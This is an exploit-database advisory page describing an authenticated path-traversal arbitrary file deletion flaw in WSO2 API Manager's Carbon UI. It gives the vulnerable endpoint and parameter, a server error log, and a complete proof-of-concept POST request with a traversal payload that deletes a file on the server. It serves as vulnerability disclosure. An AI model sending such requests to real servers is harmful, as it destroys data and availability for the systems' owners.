Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WSO2 3.1.0 - Arbitrary File Delete Vulnerability

🗓️ 13 Apr 2020 00:00:00Reported by Raki Ben HamoudaType 
zdt
 zdt🔗 0day.today👁 17 Views

WSO2 3.1.0 Arbitrary File Delete Vulnerability in API Manager Carbon U

Code
# Title: WSO2 3.1.0 - Arbitrary File Delete
# Author: raki ben hamouda
# Vendor: https://apim.docs.wso2.com
# Softwrare link: https://apim.docs.wso2.com/en/latest/
# CVE: N/A


Document Title:
===============
WOS2 API Manager(Delete Extension) Arbitrary File Delete(Path traversal )


##CVE not assigned yet

##Security Update : https://apim.docs.wso2.com/en/latest/


Common Vulnerability Scoring System:
====================================
8.5


Affected Product(s):
====================
WSO2 API Manager Carbon Interface

Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
A remote Arbitrary file delete vulnerability has been discovered in the official WSO2 API Manager Carbon UI product .
The security vulnerability allows a remote attacker with low privileges to perform authenticated application requests
and to delete arbitrary System files.

The vulnerability is located in the `/carbon/extensions/deleteExtension-ajaxprocessor.jsp` modules and the `extensionName` parameter
of the extension we want to delete. Remote attackers are able to delete arbitrary files as configuration files ,database(.db) files
via authenticated POST method requests with a crafted String arbitrary traversal files names in  "extensionName" .

The security risk of the arbitrary delete vulnerability is estimated as High with a cvss (common vulnerability scoring system) count of 8.5.
Exploitation of the Path traversal vulnerability requires a low privilege web-application user account and no user interaction.
Successful exploitation of the vulnerability results in loss of availability, integrity and confidentiality.

===============================

Error Generated by Server in case of file not found from 'logfile' ( broughts my atttention ...)

[2020-01-04 01:40:43,318] ERROR - ResourceServiceClient Failed to remove extension.
org.apache.axis2.AxisFault: File does not exist: E:\api-wso2\bin\..\repository\d
eployment\server\registryextensions\commons-dir
        at org.apache.axis2.util.Utils.getInboundFaultFromMessageContext(Utils.j
ava:531) ~[axis2_1.6.1.wso2v38.jar:?]
        at org.apache.axis2.description.OutInAxisOperationClient.handleResponse(
OutInAxisOperation.java:382) ~[axis2_1.6.1.wso2v38.jar:?]
        at org.apache.axis2.description.OutInAxisOperationClient.send(OutInAxisO
peration.java:457) ~[axis2_1.6.1.wso2v38.jar:?]
        at org.apache.axis2.description.OutInAxisOperationClient.executeImpl(Out
InAxisOperation.java:228) ~[axis2_1.6.1.wso2v38.jar:?]
        at org.apache.axis2.client.OperationClient.execute(OperationClient.java:
149) ~[axis2_1.6.1.wso2v38.jar:?]
        at org.wso2.carbon.registry.extensions.stub.ResourceAdminServiceStub.rem
oveExtension(ResourceAdminServiceStub.java:5954) ~[org.wso2.carbon.registry.exte
nsions.stub_4.7.13.jar:?]
        at org.wso2.carbon.registry.extensions.ui.clients.ResourceServiceClient.
deleteExtension(ResourceServiceClient.java:137) [org.wso2.carbon.registry.extens
ions.ui_4.7.13.jar:?]
        at org.apache.jsp.extensions.deleteExtension_002dajaxprocessor_jsp._jspS
ervice(deleteExtension_002dajaxprocessor_jsp.java:139) [hc_795974301/:?]
        at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70) [t
omcat_9.0.22.wso2v1.jar:?]

*Error displayed in Web browser with body request:

<script type="text/javascript">
    CARBON.showErrorDialog("File does not exist: E:\api-wso2\bin\..\repository\deployment\server\registryextensions\nofile.jar");
</script>



=============================

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] /carbon/extensions/deleteExtension-ajaxprocessor.jsp

Vulnerable Parameter(s):
[+] extensionName


Server version
 3.0.0


Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers with low privileged web-application user account and with no user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


1-Attacker must have access to the Extension component(List ,Add ,Delete extensions )
2-attacker  uploads any file .jar extension
3-attacker intercepts the request that follows and modifies the parameter with traversal string:

--- PoC Session Logs [POST] ---

POST /carbon/extensions/deleteExtension-ajaxprocessor.jsp HTTP/1.1
Host: localhost:9443
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest, XMLHttpRequest
X-Prototype-Version: 1.5.0
Content-type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-Token: 0OQG-MM0W-1CY9-K503-1X3I-J4M1-YF2Z-J4NS
Content-Length: 22
Origin: https://localhost:9443
Connection: close
Referer: https://localhost:9443/carbon/extensions/list_extensions.jsp?region=region3&item=list_extensions_menu
Cookie: JSESSIONID=BD1005351C7DC1E70CA763D5EBD5390B; requestedURI=../../carbon/functions-library-mgt/functions-library-mgt-add.jsp?region=region1&item=function_libraries_add; region1_configure_menu=none; region3_registry_menu=visible; region4_monitor_menu=none; region5_tools_menu=none; current-breadcrumb=extensions_menu%252Clist_extensions_menu%2523; MSG15780931689110.08734318816834985=true; MSG15780932448520.1389658752202746=true; MSG15780934638710.11615678726759582=true; MSG15780941514590.39351165459685944=true; MSG15780941548760.1587776077002745=true; MSG15780944563770.9802725740232142=true; MSG15780944882480.28388839177015013=true; MSG15780945113520.5908842754830942=true; menuPanel=visible; menuPanelType=extensions
Pragma: no-cache
Cache-Control: no-cache

extensionName=../../../../INSTALL.txt

 ---------------Returned Headers in Response------------------

HTTP/1.1 200
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Content-Type: text/html;charset=UTF-8
Content-Length: 10
Date: Sat, 04 Jan 2020 00:55:38 GMT
Connection: close
Server: WSO2 Carbon Server

#  0day.today [2020-07-19]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Apr 2020 00:00Current
0.1Low risk
Vulners AI Score0.1
arbitrary file deletepath traversalremotewso2 api managersecurity updatelow privileges
17